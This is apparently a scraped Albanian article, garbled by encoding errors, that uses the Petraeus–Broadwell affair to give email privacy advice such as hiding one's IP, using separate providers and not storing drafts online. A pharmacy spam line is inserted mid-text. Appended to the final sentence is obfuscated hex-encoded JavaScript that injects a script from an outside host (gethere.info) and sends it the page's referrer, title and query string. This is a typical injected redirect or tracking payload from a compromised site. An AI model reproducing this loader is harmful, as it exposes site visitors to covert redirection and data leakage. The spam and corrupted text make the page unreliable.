largea_email-secure1353576349

Si tA� siguroni e-mailin tuaj dhe tA� shmangni fatin e gjeneralit Petraeus

Ishte me tA� vA�rtetA� befasuese dorA�heqja e gjeneralit David Petraeus, njA� ushtarak shumA� i dekoruar nA� ushtrinA� amerikane, nga posti i tij si drejtor i CIA-s javA�n qA� shkoi.

Por befasia mA� e madhe ishte kur mA�suam se dorA�heqja e tij erdhi pA�r shkak tA� njA� lidhjeje jashtA�martesore. Ajo qA� na tA�rheq vA�mendjen A�shtA� se kjo lidhje u zbulua vetA�m pA�r shkak tA� kujdesit tA� pamjaftueshA�m pA�r sigurinA� dhe privatA�sinA� e e-mailit. SA� pari le tA� bA�jmA� njA� pA�rmbledhje tA� shkurtA�r se si nisA�n gjA�rat.

Lidhja mes David Petraeus dhe biografes sA� tij, Paula Broadwell, duket si njA� seri e a�?Homelanda�? ose ndoshta njA� komplot i filmave tA� agjentit 007, por ngjarjet A�uan te njA� hetim i FBI-sA�, i cili zbuloi pak mA� shumA� sesa thjesht “TA�rheqjen Fatale” mes protagonistA�ve. Broadwell i dA�rgoi e-maile anonime kA�rcA�nuese njA� tjetA�r gruaje, tA� cilA�n e konsideronte si rivale pA�r joshjen e Petraeus, por ishte kjo grua e cila i dha jetA� hetimit qA� e bA�ri publike kA�tA� ngjarje dhe mA� pas solli edhe dorA�heqjen dhe tatA�pjetA�n e njA�rit prej gjeneralA�ve mA� tA� shquar amerikanA� tA� kohA�ve moderne.

KA�tu nuk po ju a�?mA�sojmA�a�? se si tA� krijoni njA� lidhje jashtA�martesore apo se si tA� fshihni punA�t tuaja tA� paligjshme, por le t’i hedhim njA� sy se ku gabuan Petraeus dhe Broadwell, qA� tA� arrijmA� tA� kuptojmA� se si tA� mbrohemi mA� mirA� nA� pA�rgjithA�si dhe si ta bA�jmA� tA� sigurt e-mailin e tA� ruajmA� privatA�sinA� tonA� online.

Fshihni IP-nA� tuaj

Broadwell kujtonte se ishte e zgjuar kur dA�rgonte e-maile nga disa adresa anonime tA� Gmail nga disa vende tA� ndryshme nA� udhA�tim e sipA�r. Por ajo nuk kishte fshehur IP-nA� e saj. IP-ja juaj A�shtA� ekuivalente me shenjat tuaja tA� gishtA�rinjve.

NA� rastin e Petraeus, e-maili qA� ai dhe Broadwell pA�rdornin ishte anonim, por FBI-ja qe nA� gjendje tA� zbulonte se burimi i e-maileve ishte nA� hotele. AgjentA�t e FBI-sA� e krahasuan listA�n e klientA�ve tA� disa hoteleve dhe e ngushtuan rrethin e tA� dyshuarve, duke shkuar nA� rezultatin se e dyshuara e vetme ishte Paula Broadwell. TA� gjithA� shfletuesit kryesorA� tA� uebit kanA� njA� lloj opsioni privat, i cili megjithatA� nuk e fsheh IP-nA� tuaj, thjesht nuk lejon qA� shfletuesi tA� ruajA� tA� dhA�nat nga historia juaj e shfletimit nA� ueb. QA� tA� fshihni IP-nA�, ju duhet tA� lidheni me VPN si pA�r shembull Anonymizer Universal. Por mos harroni se edhe ofruesi i VPN-sA� do tA� ruajA� burimin e vA�rtetA� tA� IP-sA�, qA� mund t’i dorA�zohet autoriteteve me kA�rkesA�n e qeverisA�.

PA�rdorni shA�rbime tA� ndryshme e-maili
order levitra on line.
Hetimi pA�r e-mailet kA�rcA�nuese mund tA� mos kishte A�uar nA� pistA�n “Petraeus” dhe lidhja e tij jashtA�martesore mund tA� mos ishte zbuluar, por FBI-ja zbuloi se dikush qA� kishte pA�rdorur kA�tA� IP tA� dyshimtA� kishte akses edhe te njA� tjetA�r llogari e-maili, e cila i pA�rkiste drejtorit tA� CIA-s.

Gjenerali Petraeus dhe Paula Broadwell nA� fakt nuk i nisnin e-maile njA�ri-tjetrit: ata pA�rdornin njA� hile nga “manuali i terroristA�ve” dhe thjesht shkruanin mesazhe tA� cilat liheshin si drafte nA� njA� adresA� e-maili qA� i pA�rkiste gjeneralit Petraeus dhe pastaj futeshin tek e njA�jta adresA� e-maili dhe pA�rgjigjeshin.

NA�se doni tA� qA�ndroni anonimA� dhe tA� shmangni qA� dikush tA� bA�jA� lidhjen mes gjurmA�ve qA� do ta A�onin te ju, duhet tA� pA�rdorni ofrues tA� ndryshA�m e-maili.

Edhe pse kA�rkon mA� shumA� punA�, prapA� do tA� ishte e mundur tA� pA�rcaktohej aktiviteti i plotA� i njA� IP-je, nuk do tA� ishte e lehtA� tA� zbulohej menjA�herA�, si nA� kA�tA� rast.

Mos i lini mesazhet tuaja online

Petareus dhe Broadwell do tA� kenA� pasur arsyet e tyre pA�rse pA�rdornin drafte sekrete nA� vend tA� e-maileve. Ndoshta ata mendonin se mesazhet e e-maileve nuk mund tA� zbuloheshin ose gjurmoheshin nA�se nuk dA�rgoheshin. Kjo A�shtA� pjesA�risht e vA�rtetA�, por kjo do tA� thotA� se ato ruhen online, pak a shumA� nA� mA�nyrA� permanente, duke dhA�nA� mundA�sinA� qA� tA� shihen edhe mA� pas.

NdonA�se A�shtA� e vA�rtetA� qA� mesazhet mund tA� kapen kur dA�rgohen, do tA� ishte mA� e sigurt nA�se do t’i shkarkonit e-mailet nA� njA� klient lokal e-mailesh dhe t’i largonit nga serveri. TA� paktA�n kA�shtu duhet tA� kujdeseni qA� tA� mbroni vetA�m PC-nA� tuaj dhe nuk duhet tA� merakoseni aq shumA� pA�r ndonjA� thyerje tA� sigurisA� sA� serverit tA� e-mailit ose tA� ofruesit tA� shA�rbimit tA� e-mailit.

Ndoshta mund tA� mos jeni njA� oficer i dekoruar apo ndonjA� qeveritar i lartA�, ndoshta nuk jeni as biografi i dikujt. Por kjo lidhje jashtA�martesore A�shtA� njA� ilustrim i qartA� se sa e lehtA� A�shtA� qA� tA� gjurmoni gjurmA�t e dikujt online dhe tA� zbuloni informacione qA� synoheshin tA� mbaheshin sekret.

Sigurohuni qA� t’i ndiqni kA�to kA�shilla qA� tA� mos bini edhe ju viktimA�!var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}